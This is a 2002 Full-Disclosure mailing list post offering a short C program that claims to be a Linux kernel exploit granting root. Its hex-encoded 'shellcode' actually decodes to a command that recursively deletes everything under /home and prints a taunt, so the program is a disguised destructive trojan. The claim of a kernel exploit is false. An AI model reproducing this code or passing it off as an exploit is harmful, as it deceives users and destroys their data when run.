Full Disclosure mailing list archives

Proof of concept code to kill script kiddies out of the water!


From: Day Jay <d4yj4y () yahoo com>
Date: Fri, 29 Nov 2002 00:41:06 -0800 (PST)

Chung's Donut Shop
=====================

Here's a small donation to the blackhat community.
This script eradicates script kiddies.

Since ecclectic spirit is releasing a whole bunch of
cool code, we like decided to unveil this.


/* Proof of concept code!!
   DO NOT DISTRIBUTE! 

   
   Get r00t on any Linux x86 system
   With the below shellcode.
 
   It uses an exploit in the linux 
   kernel to elevate privilages to root! 

*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

main()
{
system(shellcode);
return 0;
}


__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: